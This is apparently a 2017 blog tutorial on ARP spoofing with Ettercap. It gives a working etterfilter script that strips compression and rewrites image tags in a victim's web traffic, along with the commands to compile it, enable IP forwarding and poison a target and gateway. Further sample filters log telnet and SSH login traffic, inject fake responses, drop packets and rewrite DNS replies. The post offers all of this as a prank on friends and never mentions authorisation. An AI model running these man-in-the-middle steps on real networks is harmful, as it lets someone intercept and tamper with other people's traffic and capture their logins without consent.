Ettercap - ARP Spoofing

Ettercap - ARP Spoofing Using Etterfilter to Replace Images or Other HTML tags and Syntax

Posted by Ivan Popovic on 29 OKT 2017

Ettercap - ARP Spoofing Using Etterfilter to Replace Images or Other HTML tags and Syntax

In this log we use arp spoofing to replace some tags (images) in a victim requests just for fun or prank your friends :)) ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

Ettercap

Ettercap is a free and open source tool suite for man in the middle attacks on LAN. Ettercap works by putting the network interface into promiscuous mode and by ARP poisoning the target machines. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.

ARP SPOOFING

ARP (Address Resolution Protocol) spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol, and is limited to local network segments. The basic principle behind ARP spoofing is to exploit the vulnerabilities in the ARP protocol by sending spoofed ARP messages onto the LAN. ARP spoofing attacks can be run from a compromised host on the LAN, or from an attacker's machine that is connected directly to the target LAN.

Generally, the goal of the attack is to associate the attacker's host MAC address with the IP address of a target host, so that any traffic meant for the target host will be sent to the attacker's host. The attacker may choose to inspect the packets (spying), while forwarding the traffic to the actual default gateway to avoid discovery, modify the data before forwarding it (man-in-the-middle attack), or launch a denial-of-service attack by causing some or all of the packets on the network to be dropped.

ETTERFILTER ?

Etterfilter utility is used to compile source filter files into binary filter files that can be interpreted by the JIT interpreter in the ettercap filter engine. You have to compile your filter scripts in order to use them in ettercap. All syntax/parse errors will be checked at compile time, so you will be sure to produce a correct binary filter for ettercap.

ARP SPOOFING Demos (Using EtterFilter)

In this demo, we will use arp spoofing to replace some tags (images) in a victim requests just for fun or prank your friends :)) .

STEP 1 : Create a Custom Filter Script

First, create a new folder or directory to store our filter.

ettercap

Open your favorite text editor and name the file with ".filter" extension.

ettercap

Here is a custom filter script, to replace the img tag in a html code :

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("[*] Sucked Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://3.bp.blogspot.com/-PfUQyJkxonE/VuHd2m2N-zI/AAAAAAAAAnc/clq0g6rIHQ0/s1600-r/ironbugs-kusayang.png\" ");
   msg("[+] Replace tag launched\n");
} 

That script designed to replace the img tag of any html, to the given destination URL. Save it, and make sure the script is in the folder we recently created before.

ettercap

STEP 2 : Compile The Custom Script

To compile the custom filter script, use the following etterfilter command pattern :

etterfilter [filterscript.filter] -o [outputfilter.ef]

ettercap

STEP 3 : Enable IP_Forward

Enable the ip_forward with the following command :

echo 1 > /proc/sys/net/ipv4/ip_forward

By default the value of ip_forward is '0' (disable) make sure to change the value to '1' (enable).

ettercap

STEP 4 : Run Ettercap ARP Spoofing With Custom Etterfilter

ettercap -T -q -i [interface] -F [filter file] -M ARP /[Target IP]/ /[Gateway IP]/

If you want to ARP Spoofing all target in network, you do not need to add the to specify the target.

-T, to run in text-only mode (CLI)
-q, quite mode, display less verbose output
-i, interface name
-F, specify the filter name
-M, mitm method to use 

ettercap

Test the results

Another custom filter

Below are examples of another custom filter. You can modify or add to make a complex filter.

Display a message if the tcp port is 22
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      msg("SSH packet\n");
   }
}
Log all telnet traffic, also execute ./program on every packet
if (ip.proto == TCP) {
   if (tcp.src == 23 || tcp.dst == 23) {
      log(DATA.data, "./logfile.log");
      exec("./program");
   }
}
Log all traffic except http
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
   log(DATA.data, "./logfile.log");
}
Some operation on the payload of the packet
if ( DATA.data + 20 == 0x4142 ) {
   DATA.data + 20 = 0x4243;
} else {
   DATA.data = "modified";
   DATA.data + 20 = 0x4445;
}
Drop any packet containing "ettercap"
if (search(DECODED.data, "ettercap")) {
   msg("some one is talking about us...\n");
   drop();
   kill();
}
Log ssh decrypted packets matching the regexp
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      if (regex(DECODED.data, ".*login.*")) {
         log(DECODED.data, "./decrypted_log");
      }
   }
}
Dying packets
if (ip.ttl < 5) {
   msg("The packet will die soon\n");
}
The same for IPv6 but make sure we really see IPv6 packets doing such trivial tests
if (eth.proto == IP6 && ipv6.hl < 5) {
   msg("The IPv6 packet will die soon\n");
}
String comparison at a given offset
if (DATA.data + 40 == "ette") {
   log(DATA.data, "./logfile");
}
Inject a file after a specific packet
if (tcp.src == 21 && search(DATA.data, "root")) {
   inject("./fake_response");
}
Replace the entire packet with another
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
   drop();
   inject("./fake_telnet");
}
Modifying binary data by using external commands
if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) {
   log(DATA.data, "/tmp/payload");
   drop();
   execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload");
   udp.len += 7;
   exec("/bin/rm /tmp/payload");
   msg("faked");
}
Filter only a specific ip address
if (ip.src == '192.168.0.2') {
   drop();
}
Do the same for IPv6
if (ipv6.src == '2001:db8::1') {
   drop();
}
Combined both IPv4 and IPv6
if (eth.proto == IP && ip.dst == '192.168.0.2') {
   msg("drop IPv4");
   drop();
}
if (eth.proto == IP6 && ipv6.dst == '2001:db8::1') {
   msg("drop IPv6");
   drop();
}
Translate the port of the tcp packet from 80 to 81
if (tcp.dst == 80) {
   tcp.dst -= 1;
   tcp.dst += 2;
}
Identify and mangle ESP packets
if (ip.proto == ESP) {
   DATA.data = "DEADDECAF";
}